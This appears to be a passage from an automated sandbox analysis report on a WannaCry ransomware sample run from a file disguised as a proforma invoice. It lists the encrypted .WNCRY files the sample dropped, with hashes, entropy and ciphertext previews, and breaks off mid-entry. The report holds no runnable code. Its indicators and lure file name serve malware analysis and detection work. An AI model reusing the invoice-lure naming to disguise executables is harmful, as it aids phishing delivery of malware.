                                                          SHA-256:ABAED11987B20884B76C0EA23EEB588AECD7B678C048E0D60AAC08FBFC7D7506
                                                          SHA-512:DD20B5F193955EF9730BF2ACD267AB0AB5DA19D3F42F19045E699D327CB3369B8B879B6D22A0BC4ABCEA9DBDB6B1E6EBDDD1672BCC7897022887E2274F58F4A0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....z...;]G...A.*6...F..k..N.~(...D..Bce.. ...!..T,.-7W.'.$..A.7(.I.:9G.....s...e..sy.1#$@.O.R......3d..z.%.z.[2&.ks.l.....s..D....z......f.....#r.Laws.+K..4.Zy.n...i.Q.....<q?....@........>A.j..[~...M.........*...2..M.\.f5..Ai.L.DI.C...xRc................~.@%.....-...P....Z.$p`.......1..bh..y.+.KE$X.!G..|(b..Q.....,...E...v...S.3..B..!...,...T.R.Rg..H........a...Ae.....t....#Y..o.k.=..N.}..e..J.vgs..\TN.0..l..M.,...-3..Fq.Z7A0.+....m..=1..M-...<Hd..G...o.w....=Nw.vH...$M...x.Jh/.V......&.5.[cdr..N...@..<..B.....9Y.l..<X....8.[D>.'......s;. .h.|..r..L...H..g..N>..G...J....z..!.....2..F#a...dr...ud.*......:..A.6.].q.8.,j..KH..e....'.8........[.h`[..... .....]........bd...I.g.b..e........k...%.....R...\.[@ZF.(.-U..k..Q..6...'Z..0{.4_js.{.....<A.!QN0V.F....qIl..D.)p%.....i....W._(...f...|9).I._ ;..R[#...ag*.[....2z.D:0H....HK...k....L.....1m..@....Vx.]....7....#9.....8.O.h.Z#..g.4....S.^y6.....r~.[.r..#*E..k~'.W.^.h.)...U..

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QDJMYJSCGL.mp3.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.854514020971324
                                                          Encrypted:false
                                                          SSDEEP:24:bk0JFZJ+3rZmy5yTRL/c+jthFbNCaXWnAfpq2FAyuZEKspDxf0A895R9c/DQvAlK:bkoZ83t00+BNNXWJEKWBn89rS/kegF
                                                          MD5:36F58FE1ABC2ADCC680328D6CBB6757F
                                                          SHA1:4185DA22C501B6D8214DA4335A2DA99E57566738
                                                          SHA-256:5D9DE0D1A49382243567630BB10A2926C0803C2878D4B907BA89D2E072359A13
                                                          SHA-512:157703A0CCB60D0785DF885A97C2F2AB318FB362B0C139A59970F1B5BBEF7FB6CEE1C25942437BA6DAC0A07F0E4376F0A1A037A8A3FABE71EC133623F295595F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....(..5...'t....D}.`..Lm.."<.O..ia.d.b..}4....h..e$%...[c..?..~h..D3...<X.g..K...t......G+..b.c.......G....%..0...T....<5S...e.k..kL.o.....%....z...."].~#h.kx..0W*.mrI..@..x.Le.....S......eT.E....e..D...c..ZZ...P...>l80.F|.[..#FT..#$..84.3Y......................`...U.#!g,.w...\Iw.5..>...zN..A..`$2'i1.ra.V0qN.......39...@PPOj~iK..E.qr.r.....6..[..h.;.[..zG~.?...g....,".h....}...@.t...]._..4....Ph..0....I.07..!E.MU.Uz.D.d].Z....#....0..GQ...:......HB%...Y.l....".@,b.k..<...{....Q.........{.Y.g.......0....B..Z.41N....Y.1..wx....{1.v..2`.r...#.(.A..k....c].....r..O.?.}.BZ[...I+`.0...a...f.u...-P.j...]..\.H5...........oVz......L.M.K..lq.W.OU../x...T E.ES8.v...M...U~...vT[.1..6...1.....S....].B.#..Q.j.D;.G%R.Mj.Z.(H..y2Qh..1.).8...x.BI.S[....r.^...d%...r.\...*.5.N.Z.={S.y..y(.C.>.\....6l5X....[)U..%.....N......|... ..d....X.2..<(...h&.S4...2....Y....r.....p...d.wO=...5ev0K..L6..._.`y...0g..95..=................\^iB...6.F.T.+.....nCN.A..V5.u

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QDJMYJSCGL.mp3.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.854514020971324
                                                          Encrypted:false
                                                          SSDEEP:24:bk0JFZJ+3rZmy5yTRL/c+jthFbNCaXWnAfpq2FAyuZEKspDxf0A895R9c/DQvAlK:bkoZ83t00+BNNXWJEKWBn89rS/kegF
                                                          MD5:36F58FE1ABC2ADCC680328D6CBB6757F
                                                          SHA1:4185DA22C501B6D8214DA4335A2DA99E57566738
                                                          SHA-256:5D9DE0D1A49382243567630BB10A2926C0803C2878D4B907BA89D2E072359A13
                                                          SHA-512:157703A0CCB60D0785DF885A97C2F2AB318FB362B0C139A59970F1B5BBEF7FB6CEE1C25942437BA6DAC0A07F0E4376F0A1A037A8A3FABE71EC133623F295595F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....(..5...'t....D}.`..Lm.."<.O..ia.d.b..}4....h..e$%...[c..?..~h..D3...<X.g..K...t......G+..b.c.......G....%..0...T....<5S...e.k..kL.o.....%....z...."].~#h.kx..0W*.mrI..@..x.Le.....S......eT.E....e..D...c..ZZ...P...>l80.F|.[..#FT..#$..84.3Y......................`...U.#!g,.w...\Iw.5..>...zN..A..`$2'i1.ra.V0qN.......39...@PPOj~iK..E.qr.r.....6..[..h.;.[..zG~.?...g....,".h....}...@.t...]._..4....Ph..0....I.07..!E.MU.Uz.D.d].Z....#....0..GQ...:......HB%...Y.l....".@,b.k..<...{....Q.........{.Y.g.......0....B..Z.41N....Y.1..wx....{1.v..2`.r...#.(.A..k....c].....r..O.?.}.BZ[...I+`.0...a...f.u...-P.j...]..\.H5...........oVz......L.M.K..lq.W.OU../x...T E.ES8.v...M...U~...vT[.1..6...1.....S....].B.#..Q.j.D;.G%R.Mj.Z.(H..y2Qh..1.).8...x.BI.S[....r.^...d%...r.\...*.5.N.Z.={S.y..y(.C.>.\....6l5X....[)U..%.....N......|... ..d....X.2..<(...h&.S4...2....Y....r.....p...d.wO=...5ev0K..L6..._.`y...0g..95..=................\^iB...6.F.T.+.....nCN.A..V5.u

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QDJMYJSCGL.pdf.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.865157842880832
                                                          Encrypted:false
                                                          SSDEEP:24:bkATHo5hUH7TZcNAcbLIlV4+fDW5EL8EMOJvZs5JcHHAiUxE+9El:bkATHWUHxMAcofnapIrHA/xEWk
                                                          MD5:FBF3D85DD6468076AD2EF07DF88CD0D5
                                                          SHA1:BF54C00E3B6EFA1F8E7F407764C07803E9261652
                                                          SHA-256:475DF39F1065F906D2B787D69B14EE5AD6C49C882AB7CD2BF18571A1975397B9
                                                          SHA-512:9349E2032D13C49E8B8C7A347812279E0A73D9F2DF561914E5AF9A0E01627E147EB342B5FEF47969A6F14CEDC8F6DF27886FD3A8B1E8427826FE7B6A78B4106E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!..........)gR.....i=....i...`..]..q....F..u.b...i....%..R,.:E....f.%.$...D.g.0A.;.6-.P6..a(....y.z.f.D........O..B.Xw..">y...{.:...v"....<..i..>..=...J/...b..:..?...z...-2~.{d.|.2.h..7.Se...w.....0)Dc#..^..\..+....P..?...84[........:$N.....NMI.............(.........9.q._.y....xz.;...@..4.........w..1..P..x..g....5..}.....n..;*.5.cHd>*Ie....2.2f...r.|....x.(o.3.......f.Wtm|s.......T..e.:eY...r.D.U.PE.).(.you..;%vs.J~..Y.:.*......-W.mB..t.M..A.fQ.....7.P..kX.......%x.Y.[8Y....+.e..._4...2TU.9..?.tV....>.....L....Z....T.W...VQ..U..O......M.........b$....v ....S.q..sl.(P ,.a..wDz..a?m....a$0.3.R....3.RF....&`p..Y<g..eW.F#......w........gO^..!....I.....z.....JYyt..~......-......i..Y....`,.u..!}.\.e..1;s......J]|..}w...\3.|...s.#..%u./;...........6.+...Q'q..d......-..gU..\.xZc+.pt,...>Ir....>...-t.].#&.....gc..Ay........Z.F.,..H.X`yL#.g).V..s.1.E.,...!kbUqW..O..1\...V............`.<.X.2..zF.\.fMEE...A........J...;.A.#"

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QDJMYJSCGL.pdf.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.865157842880832
                                                          Encrypted:false
                                                          SSDEEP:24:bkATHo5hUH7TZcNAcbLIlV4+fDW5EL8EMOJvZs5JcHHAiUxE+9El:bkATHWUHxMAcofnapIrHA/xEWk
                                                          MD5:FBF3D85DD6468076AD2EF07DF88CD0D5
                                                          SHA1:BF54C00E3B6EFA1F8E7F407764C07803E9261652
                                                          SHA-256:475DF39F1065F906D2B787D69B14EE5AD6C49C882AB7CD2BF18571A1975397B9
                                                          SHA-512:9349E2032D13C49E8B8C7A347812279E0A73D9F2DF561914E5AF9A0E01627E147EB342B5FEF47969A6F14CEDC8F6DF27886FD3A8B1E8427826FE7B6A78B4106E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!..........)gR.....i=....i...`..]..q....F..u.b...i....%..R,.:E....f.%.$...D.g.0A.;.6-.P6..a(....y.z.f.D........O..B.Xw..">y...{.:...v"....<..i..>..=...J/...b..:..?...z...-2~.{d.|.2.h..7.Se...w.....0)Dc#..^..\..+....P..?...84[........:$N.....NMI.............(.........9.q._.y....xz.;...@..4.........w..1..P..x..g....5..}.....n..;*.5.cHd>*Ie....2.2f...r.|....x.(o.3.......f.Wtm|s.......T..e.:eY...r.D.U.PE.).(.you..;%vs.J~..Y.:.*......-W.mB..t.M..A.fQ.....7.P..kX.......%x.Y.[8Y....+.e..._4...2TU.9..?.tV....>.....L....Z....T.W...VQ..U..O......M.........b$....v ....S.q..sl.(P ,.a..wDz..a?m....a$0.3.R....3.RF....&`p..Y<g..eW.F#......w........gO^..!....I.....z.....JYyt..~......-......i..Y....`,.u..!}.\.e..1;s......J]|..}w...\3.|...s.#..%u./;...........6.+...Q'q..d......-..gU..\.xZc+.pt,...>Ir....>...-t.].#&.....gc..Ay........Z.F.,..H.X`yL#.g).V..s.1.E.,...!kbUqW..O..1\...V............`.<.X.2..zF.\.fMEE...A........J...;.A.#"

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QFAPOWPAFG.mp3.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.844886838735367
                                                          Encrypted:false
                                                          SSDEEP:24:bk3oNRd0EOApf3YMIu1BXFVsNtkbFJ7xdgmfVPpnA8ONkyus9gIVSaWSIY9S3s/k:bkYTOyZFVxgmNBnAtN9v95VbCs/hxUn
                                                          MD5:BFFD7BEAFCDA1C986E48D72CFEE4F29B
                                                          SHA1:95300AB3DE5F0C6E6F4C05F9AAA90C553DB3B39A
                                                          SHA-256:334E02E579DB79E9A67CFAA10522ACE498A74C9AB20394BCF8B3B817E06DE3C2
                                                          SHA-512:EBC472C21065CF0502339C87B2C325DA684631F3E6F91D91873CCE32E755226EEC6664B2F1A5AE7FCFA99F25204A05AD185449225DEE4141496EE12D969F1906
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....b...w.....d..O#..].Z.Q"1.....(Mm....2..|E.a..].q......8.BQ...^.P...6..T.RD.p.N.^k..l.{.1.x.`.......0Q...Nn..H...\?C_C(..U3am1.p;x.V..].=.>....._WC..S.....$[...b..9.....`.0....TpFpKx....b.j..k3.<..>N$r..|...?...U..?..p....K.:&a{...F...n...q.............z:6..W.i......v..qj........+....y.,.W9-...}......;...*k.l*{....S....~#....'.].5.Y....F. ...R(.8.....lX._c.....<.Y. ..l).6 s6{=.%....n......$Y](.Zf....P...F.ye.....Yf...|.S.....$.$,q..I...G.f..7{..Mk<^..2.x.:..u.T...7i...VG~{...*`Ys....+.I.C.3.~..b.P.T......)....i.f@..7e^5.^q..0h....K..h.XI..6.c.1<&%$.?sO.............Xd...L....k......yR\~.?.....qO...B...>.;..C....<.o...j..|?.j|.kn..8E.._?+o......}-.X`N.o{..S....+5.r.W....v3Lo...C.W.X.........JKL..q.>.....%.zZ$a...D4.._....6....-..#.po....Rnh..)...Ba.s..\G.=A=v$))..^.q74..+. cZ.]r.........$.(a.Knj........Pxk|.d.`K.#8.#...2...j.43f.......B;...E\...U.......H..WQ.D..(P......L.......>..B.^........+.Z.....B"..W0....B.Q:_.~...d.e...:..V..F

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QFAPOWPAFG.mp3.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.844886838735367
                                                          Encrypted:false
                                                          SSDEEP:24:bk3oNRd0EOApf3YMIu1BXFVsNtkbFJ7xdgmfVPpnA8ONkyus9gIVSaWSIY9S3s/k:bkYTOyZFVxgmNBnAtN9v95VbCs/hxUn
                                                          MD5:BFFD7BEAFCDA1C986E48D72CFEE4F29B
                                                          SHA1:95300AB3DE5F0C6E6F4C05F9AAA90C553DB3B39A
                                                          SHA-256:334E02E579DB79E9A67CFAA10522ACE498A74C9AB20394BCF8B3B817E06DE3C2
                                                          SHA-512:EBC472C21065CF0502339C87B2C325DA684631F3E6F91D91873CCE32E755226EEC6664B2F1A5AE7FCFA99F25204A05AD185449225DEE4141496EE12D969F1906
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....b...w.....d..O#..].Z.Q"1.....(Mm....2..|E.a..].q......8.BQ...^.P...6..T.RD.p.N.^k..l.{.1.x.`.......0Q...Nn..H...\?C_C(..U3am1.p;x.V..].=.>....._WC..S.....$[...b..9.....`.0....TpFpKx....b.j..k3.<..>N$r..|...?...U..?..p....K.:&a{...F...n...q.............z:6..W.i......v..qj........+....y.,.W9-...}......;...*k.l*{....S....~#....'.].5.Y....F. ...R(.8.....lX._c.....<.Y. ..l).6 s6{=.%....n......$Y](.Zf....P...F.ye.....Yf...|.S.....$.$,q..I...G.f..7{..Mk<^..2.x.:..u.T...7i...VG~{...*`Ys....+.I.C.3.~..b.P.T......)....i.f@..7e^5.^q..0h....K..h.XI..6.c.1<&%$.?sO.............Xd...L....k......yR\~.?.....qO...B...>.;..C....<.o...j..|?.j|.kn..8E.._?+o......}-.X`N.o{..S....+5.r.W....v3Lo...C.W.X.........JKL..q.>.....%.zZ$a...D4.._....6....-..#.po....Rnh..)...Ba.s..\G.=A=v$))..^.q74..+. cZ.]r.........$.(a.Knj........Pxk|.d.`K.#8.#...2...j.43f.......B;...E\...U.......H..WQ.D..(P......L.......>..B.^........+.Z.....B"..W0....B.Q:_.~...d.e...:..V..F

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QFAPOWPAFG.pdf.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.83808430958597
                                                          Encrypted:false
                                                          SSDEEP:24:bk69WbMEJ8DvcVuQt/CAIrnPLTKGgO4HMBAG0g+NK0pt5LUblhb3fxb1pjv8N4:bkkddmxCJWFO4HYAGZWt5LGhrfxb1pjv
                                                          MD5:2F3DE02619B914364851A8B38210F281
                                                          SHA1:378B1B56B69D33164318798D6A597E45CC16DA74
                                                          SHA-256:BD631346A895A9CFBED56B23079624896089462EB536FA029F65A3D81E34C281
                                                          SHA-512:B577FB7237848BCAB1403B622938B2F08A82B3E23C70AEF3EDCF376249A61DF977D21DFDDE07720314F13B9174947172DB8C72D8A127D867EB42A37C235CDAB8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....+.`@...&.}.#ItJHo....xN.#...1'...h..!.K.....`c...t......:g. ..Z. Kw.O. .x....xE."..|*..:.X..A..=L.).....&R!2.V.]m...s.Q}.m-..z...U. -..JX[`.B./...'N...6.%..5L....QcF-......0g..8<.......ww AG.....0. t._.....3.A.N.O.......F\..;.......]#...*...............W"?....;......(i.QbIp......UCbz....f.-v...}.....@.L..+.@....4.^....1W..H....m..-ba..\.....D..1UU...5.8.. ...q?...N.C..b~........X#......3.x.....\.........L..\...C>.KBlg....,h$..R....X-.JH."_....$..>.n}....4.8te.1.....H...n..ee.o.o$;,.k........u.......@.....?r.=.V....2=~z..u.D..f..).Z....w...0.U.o.nJ...)i....S .U..V3=......N.`.m.....w....{Xo...5..*......,........R..;c.h*.(..y`...\..mn.R$..i.{.V..s......AJ.Y~.d......%5..W..`Q.%Jr.,.W.....~l.hI..E..(....2.p..6r_.7...((_..E.>.^..a.{..N=...q..7.......&y.`I;.z..A..m....-1.d.n...AY,.vb.QPb.n,..k..1#<..l(.h.....g.R...-...<1o.E...."^.X...;z.>(.A]..a.u.-4.~.....";..]..1.G6?;..k....Z.`......U..] o./H.j..?..".n..UT.p....V3<^...........#...c.

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QFAPOWPAFG.pdf.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.83808430958597
                                                          Encrypted:false
                                                          SSDEEP:24:bk69WbMEJ8DvcVuQt/CAIrnPLTKGgO4HMBAG0g+NK0pt5LUblhb3fxb1pjv8N4:bkkddmxCJWFO4HYAGZWt5LGhrfxb1pjv
                                                          MD5:2F3DE02619B914364851A8B38210F281
                                                          SHA1:378B1B56B69D33164318798D6A597E45CC16DA74
                                                          SHA-256:BD631346A895A9CFBED56B23079624896089462EB536FA029F65A3D81E34C281
                                                          SHA-512:B577FB7237848BCAB1403B622938B2F08A82B3E23C70AEF3EDCF376249A61DF977D21DFDDE07720314F13B9174947172DB8C72D8A127D867EB42A37C235CDAB8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....+.`@...&.}.#ItJHo....xN.#...1'...h..!.K.....`c...t......:g. ..Z. Kw.O. .x....xE."..|*..:.X..A..=L.).....&R!2.V.]m...s.Q}.m-..z...U. -..JX[`.B./...'N...6.%..5L....QcF-......0g..8<.......ww AG.....0. t._.....3.A.N.O.......F\..;.......]#...*...............W"?....;......(i.QbIp......UCbz....f.-v...}.....@.L..+.@....4.^....1W..H....m..-ba..\.....D..1UU...5.8.. ...q?...N.C..b~........X#......3.x.....\.........L..\...C>.KBlg....,h$..R....X-.JH."_....$..>.n}....4.8te.1.....H...n..ee.o.o$;,.k........u.......@.....?r.=.V....2=~z..u.D..f..).Z....w...0.U.o.nJ...)i....S .U..V3=......N.`.m.....w....{Xo...5..*......,........R..;c.h*.(..y`...\..mn.R$..i.{.V..s......AJ.Y~.d......%5..W..`Q.%Jr.,.W.....~l.hI..E..(....2.p..6r_.7...((_..E.>.^..a.{..N=...q..7.......&y.`I;.z..A..m....-1.d.n...AY,.vb.QPb.n,..k..1#<..l(.h.....g.R...-...<1o.E...."^.X...;z.>(.A]..a.u.-4.~.....";..]..1.G6?;..k....Z.`......U..] o./H.j..?..".n..UT.p....V3<^...........#...c.

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UAAXGSSVHQ.mp3.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.835397418606441
                                                          Encrypted:false
                                                          SSDEEP:24:bkDDIlqgd2fFY6bJU/UzDW9uFaojT/S1SNgsUedJykdzh+Nl75GXnyTw:bkXIlqf+suwF61SlUenva14nyk
                                                          MD5:E0DF0BF8892639C3BFD0264A9FC1B088
                                                          SHA1:EE555CC7EF4C327E3ABFC5D50A02D21B263BDFFF
                                                          SHA-256:8AFDD68F9D3A7F843ADFC5926D4C57BE3D56251484353B86FC6B8A9512A08A64
                                                          SHA-512:F04DBD8FBC9A8C26A7D770FEC32DB14F971E6BBE6EB8CF28B377379BD327813CBCE931B75CE2550ED2B95B989479D91873234C4411F68CB03C596C9ADAEE94F0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....1..+. .).(..W.......p..f\...t..e........0.....u..VS*......Q.....,qUM(K.b...#..!.$...8eY..LHh>.:?p?N......q]....C.i..l..G..xSi.(I!{p.r.;....C.P.#^...<@X.......W_T.....'..:H......J....@.....!...k.......+X=....3.6S?..*.x. -.......~..N.O..A.0...5............B......*.........(...[.......* ..j.....a..K.\.3.f.^o......W....2)........|..H.iF.0...:0j.naz..$_.....x..lP.J.([....}..J..8s..V:P.p.rJ.M..D.I.4.....P.M.U.B?&....M..u....od.{.n...P.....u......"..V.b.B.'.]..w.$.....B..Iz........Uo.bN..J..c.5.?.h.....GFa)..........U...l.1..G.}...#/(SY.0...j9i...@h`.....6...WP..A..p.^.. .e.%.7z\..N..<B."7*.4......g....`.w@.PL>.....t3a.F._...G`.5..5.[..l.I..2...`......N..tb...eE.!S.3.ny..._....r.$.H...j..<...G..j'..za.+....>.#.._}..............v......R..G.R.>...*.S.pN.... (W.....l...."..+.n7\.0!p.......Q<........k.j..{..z....v..+ps.).`..JJ'...G.[.PZ'.....i....E.,.s....IH.ZGLHNJeM..#.............\.1....l.h..5.....6..A.....+.../%.|=.......n..#.p

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UAAXGSSVHQ.mp3.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.835397418606441
                                                          Encrypted:false
                                                          SSDEEP:24:bkDDIlqgd2fFY6bJU/UzDW9uFaojT/S1SNgsUedJykdzh+Nl75GXnyTw:bkXIlqf+suwF61SlUenva14nyk
                                                          MD5:E0DF0BF8892639C3BFD0264A9FC1B088
                                                          SHA1:EE555CC7EF4C327E3ABFC5D50A02D21B263BDFFF
                                                          SHA-256:8AFDD68F9D3A7F843ADFC5926D4C57BE3D56251484353B86FC6B8A9512A08A64
                                                          SHA-512:F04DBD8FBC9A8C26A7D770FEC32DB14F971E6BBE6EB8CF28B377379BD327813CBCE931B75CE2550ED2B95B989479D91873234C4411F68CB03C596C9ADAEE94F0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....1..+. .).(..W.......p..f\...t..e........0.....u..VS*......Q.....,qUM(K.b...#..!.$...8eY..LHh>.:?p?N......q]....C.i..l..G..xSi.(I!{p.r.;....C.P.#^...<@X.......W_T.....'..:H......J....@.....!...k.......+X=....3.6S?..*.x. -.......~..N.O..A.0...5............B......*.........(...[.......* ..j.....a..K.\.3.f.^o......W....2)........|..H.iF.0...:0j.naz..$_.....x..lP.J.([....}..J..8s..V:P.p.rJ.M..D.I.4.....P.M.U.B?&....M..u....od.{.n...P.....u......"..V.b.B.'.]..w.$.....B..Iz........Uo.bN..J..c.5.?.h.....GFa)..........U...l.1..G.}...#/(SY.0...j9i...@h`.....6...WP..A..p.^.. .e.%.7z\..N..<B."7*.4......g....`.w@.PL>.....t3a.F._...G`.5..5.[..l.I..2...`......N..tb...eE.!S.3.ny..._....r.$.H...j..<...G..j'..za.+....>.#.._}..............v......R..G.R.>...*.S.pN.... (W.....l...."..+.n7\.0!p.......Q<........k.j..{..z....v..+ps.).`..JJ'...G.[.PZ'.....i....E.,.s....IH.ZGLHNJeM..#.............\.1....l.h..5.....6..A.....+.../%.|=.......n..#.p

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VWDFPKGDUF.jpg.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.834036981171114
                                                          Encrypted:false
                                                          SSDEEP:24:bkef24aaYvNwjyY5zc/oOplqSyqGiABoV8SrNxwot04FZfmlDtdMX:bk14aaYvNwjnzcgOplqSyox8QNmiStd8
                                                          MD5:49B2A6933AEBCA28785EAC16867CE920
                                                          SHA1:2B7BE4D6C777035738E7281F5356329B81D1E005
                                                          SHA-256:374FD210879029E867E1EB23E84374DB9AE7F7198761EEB9A133167580CA42FB
                                                          SHA-512:E0979167EBA0FFE8502BD57F744206EAB81E6681A3B77D140A7DC68265F0C0A5F96F1BD087E15403A0B8A4F4A821D211D7B2C07B68D1EED7D8B72773B74502FF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....cC...TUY.SM.e%...C...s0c8m..[..{:...!.O*5.V..4..y........[...7..<.c._.V;...<.*......}.5J>...m....Q.....!...N/..;.<..2.c..a......9t.t"....h..v.a..=...).-..a._{p.T5.0Op...ON@#.O*......LnJj.r..%~v..|.KE.Rm.+..p......L....Jd+.]....[w.h..[...t5y~.............<.#..W.f'..B....sF..r1...$A..%?..U..3.6.....t......6s..f..}u@......8."$1...0...y.>B...5...T.S...0...tc.../...'TdF..b......We....G.z..:..JSO..>.1..J.7....Hp....hU..8.c...*......{5;...N.g9., o....6"..|.r..wH.y.EN*8s.x.w...+=.s....s..t.V.A.6.D.Xo....AD...T.H.U.Qf^Ef.._l.p.......|/.}X...D...2..4.o_f]...r..N@.Pb..{.....9c.Aj.gx..XZ>%.BT("=9...YE...........3.!..);p.\^.%...^I.....T....?U.v..... 8%...S.].s.(......#....>].....D.VATA.......q!.C...[;..u..e.,.4F<..+..`p.P.g.....hJ.8.\.....~.^c.M./....-.D.....~v....p...Cy.o!..t...R3....@&..y..~. .....4.d.A...h..3:@.:..[.B.O{.!....:.5....{.c..k7...C5...7{.scU-6.x(p>/.....&Z...l......s+s.....JA..........5................2........$"S.v.

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VWDFPKGDUF.jpg.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.834036981171114
                                                          Encrypted:false
                                                          SSDEEP:24:bkef24aaYvNwjyY5zc/oOplqSyqGiABoV8SrNxwot04FZfmlDtdMX:bk14aaYvNwjnzcgOplqSyox8QNmiStd8
                                                          MD5:49B2A6933AEBCA28785EAC16867CE920
                                                          SHA1:2B7BE4D6C777035738E7281F5356329B81D1E005
                                                          SHA-256:374FD210879029E867E1EB23E84374DB9AE7F7198761EEB9A133167580CA42FB
                                                          SHA-512:E0979167EBA0FFE8502BD57F744206EAB81E6681A3B77D140A7DC68265F0C0A5F96F1BD087E15403A0B8A4F4A821D211D7B2C07B68D1EED7D8B72773B74502FF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....cC...TUY.SM.e%...C...s0c8m..[..{:...!.O*5.V..4..y........[...7..<.c._.V;...<.*......}.5J>...m....Q.....!...N/..;.<..2.c..a......9t.t"....h..v.a..=...).-..a._{p.T5.0Op...ON@#.O*......LnJj.r..%~v..|.KE.Rm.+..p......L....Jd+.]....[w.h..[...t5y~.............<.#..W.f'..B....sF..r1...$A..%?..U..3.6.....t......6s..f..}u@......8."$1...0...y.>B...5...T.S...0...tc.../...'TdF..b......We....G.z..:..JSO..>.1..J.7....Hp....hU..8.c...*......{5;...N.g9., o....6"..|.r..wH.y.EN*8s.x.w...+=.s....s..t.V.A.6.D.Xo....AD...T.H.U.Qf^Ef.._l.p.......|/.}X...D...2..4.o_f]...r..N@.Pb..{.....9c.Aj.gx..XZ>%.BT("=9...YE...........3.!..);p.\^.%...^I.....T....?U.v..... 8%...S.].s.(......#....>].....D.VATA.......q!.C...[;..u..e.,.4F<..+..`p.P.g.....hJ.8.\.....~.^c.M./....-.D.....~v....p...Cy.o!..t...R3....@&..y..~. .....4.d.A...h..3:@.:..[.B.O{.!....:.5....{.c..k7...C5...7{.scU-6.x(p>/.....&Z...l......s+s.....JA..........5................2........$"S.v.

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VWDFPKGDUF.xlsx.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.834618125394637
                                                          Encrypted:false
                                                          SSDEEP:24:bkV8TGLdzcA9qbgT9pAObp8bpXWDNkTFX8fiOXLSUqBiIPrXtj7bR/e5lcjiAGx5:bkVgUJTAO0pXXBlOXNZIxBe/c3GL
                                                          MD5:DF7C3538E50D4E9B08011A658FB4EAC0
                                                          SHA1:C916C62B47B73FC89615EA9480785FB4316CA98B
                                                          SHA-256:0B5657B56341D0DE18CE3D2BE959F0FB1BD64A50DAA9F18DD4D78C6EB11167D5
